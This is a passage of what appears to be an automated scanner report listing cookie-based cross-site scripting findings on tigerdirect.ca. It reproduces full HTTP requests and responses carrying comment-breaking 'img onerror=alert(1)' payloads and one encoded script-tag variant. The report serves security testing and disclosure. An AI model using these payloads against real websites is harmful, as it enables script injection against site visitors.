Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4472f62%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E423e7fc100a; path=/
Set-Cookie: SRVR=WEBX14%2D04A; path=/
Vary: Accept-Encoding
Content-Length: 75972


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--Cart(Referer) :e8400--><img src=a onerror=alert(1)>388bbaf6467-->
...[SNIP]...

3.481. http://www.tigerdirect.ca/cgi-bin/order.asp [CoreAt cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /cgi-bin/order.asp

Issue detail

The value of the CoreAt cookie is copied into an HTML comment. The payload 8693a--><img%20src%3da%20onerror%3dalert(1)>4f098fcc7c7 was submitted in the CoreAt cookie. This input was echoed as 8693a--><img src=a onerror=alert(1)>4f098fcc7c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-bin/order.asp?EdpNo=1104495&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=8693a--><img%20src%3da%20onerror%3dalert(1)>4f098fcc7c7

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:27:38 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=e8400%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E388bbaf6467&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4472f62%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E423e7fc100a; path=/
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Vary: Accept-Encoding
Content-Length: 75985


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--CoreAt :8693a--><img src=a onerror=alert(1)>4f098fcc7c7-->
...[SNIP]...

3.482. http://www.tigerdirect.ca/cgi-bin/order.asp [CoreID6 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /cgi-bin/order.asp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 6cf8c--><img%20src%3da%20onerror%3dalert(1)>a54e117ae86 was submitted in the CoreID6 cookie. This input was echoed as 6cf8c--><img src=a onerror=alert(1)>a54e117ae86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-bin/order.asp?EdpNo=1104495&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=902153576cf8c--><img%20src%3da%20onerror%3dalert(1)>a54e117ae86; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:27:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA04A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=e8400%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E388bbaf6467&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4472f62%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E423e7fc100a; path=/
Set-Cookie: SRVR=WEBX14%2D04A; path=/
Vary: Accept-Encoding
Content-Length: 76023


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--CoreID6(061918809774:902153576cf8c--><img src=a onerror=alert(1)>a54e117ae86-->
...[SNIP]...

3.483. http://www.tigerdirect.ca/cgi-bin/order.asp [DB cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /cgi-bin/order.asp

Issue detail

The value of the DB cookie is copied into an HTML comment. The payload 72f62--><img%20src%3da%20onerror%3dalert(1)>423e7fc100a was submitted in the DB cookie. This input was echoed as 72f62--><img src=a onerror=alert(1)>423e7fc100a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-bin/order.asp?EdpNo=1104495&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4472f62--><img%20src%3da%20onerror%3dalert(1)>423e7fc100a; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:26:24 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&TotalItems=1&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=&ProductTotal=79%2E98; path=/
Set-Cookie: DB=msRandX=4472f62%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E423e7fc100a&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX13%2D01A; path=/
Vary: Accept-Encoding
Content-Length: 75975


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--DB(msRandX) :4472f62--><img src=a onerror=alert(1)>423e7fc100a-->
...[SNIP]...

3.484. http://www.tigerdirect.ca/cgi-bin/order.asp [SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /cgi-bin/order.asp

Issue detail

The value of the SessionId cookie is copied into an HTML comment. The payload 78edc--><img%20src%3da%20onerror%3dalert(1)>5fa9cd9afa6 was submitted in the SessionId cookie. This input was echoed as 78edc--><img src=a onerror=alert(1)>5fa9cd9afa6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-bin/order.asp?EdpNo=1104495&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=430401020110930082320502312310678edc--><img%20src%3da%20onerror%3dalert(1)>5fa9cd9afa6; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:26:54 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=e8400%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E388bbaf6467&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4472f62%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E423e7fc100a; path=/
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Vary: Accept-Encoding
Content-Length: 76023


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--SessionId :430401020110930082320502312310678edc--><img src=a onerror=alert(1)>5fa9cd9afa6-->
...[SNIP]...

3.485. http://www.tigerdirect.ca/retailstores/indexca.asp [Cart cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /retailstores/indexca.asp

Issue detail

The value of the Cart cookie is copied into an HTML comment. The payload 531a8--><img%20src%3da%20onerror%3dalert(1)>5c3e9baaabe was submitted in the Cart cookie. This input was echoed as 531a8--><img src=a onerror=alert(1)>5c3e9baaabe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /retailstores/indexca.asp HTTP/1.1
Host: www.tigerdirect.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.ca/cgi-bin/order.asp?EdpNo=1104495%27&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128
Cookie: Warranty=POPPED; SRCCODE=CANWGOOFS; beta=Y; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Ficart%2Easp%3Fp%3Dupsell&PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Referer=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Forder%2Easp%3FEdpNo%3D1104495%2527%26qty%3D1%26cm%5Fre%3DHomepage%2D%5F%2DSpot%252003%2D%5F%2DCatId%5F4441%5FP229%2D1128&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17531a8--><img%20src%3da%20onerror%3dalert(1)>5c3e9baaabe; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12; SRVR=WEBX14%2D03B; SessionId=492415201109300846025023123106; CoreID6=70269293307913173868372&ci=90215357; 90215357_clogin=l=1317386837&v=7&e=1317388681139; CoreAt=90215357=1|2|0|0|0|0|0|0|0|0|0|0|1|1317386837||&

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:51:53 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Set-Cookie: DB=msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpga4be4dd2623cf70b362ab44c; path=/
Set-Cookie: Cart=rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17531a8%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5c3e9baaabe&Referer=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Forder%2Easp%3FEdpNo%3D1104495%2527%26qty%3D1%26cm%5Fre%3DHomepage%2D%5F%2DSpot%252003%2D%5F%2DCatId%5F4441%5FP229%2D1128&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&PHRoutine=25&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Ficart%2Easp%3Fp%3Dupsell; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CANW; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 113833


<html>
<head>
<title>Computer Stores, Discount Computer Stores, Retail Computer Stores. TigerDirect.ca</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta nam
...[SNIP]...
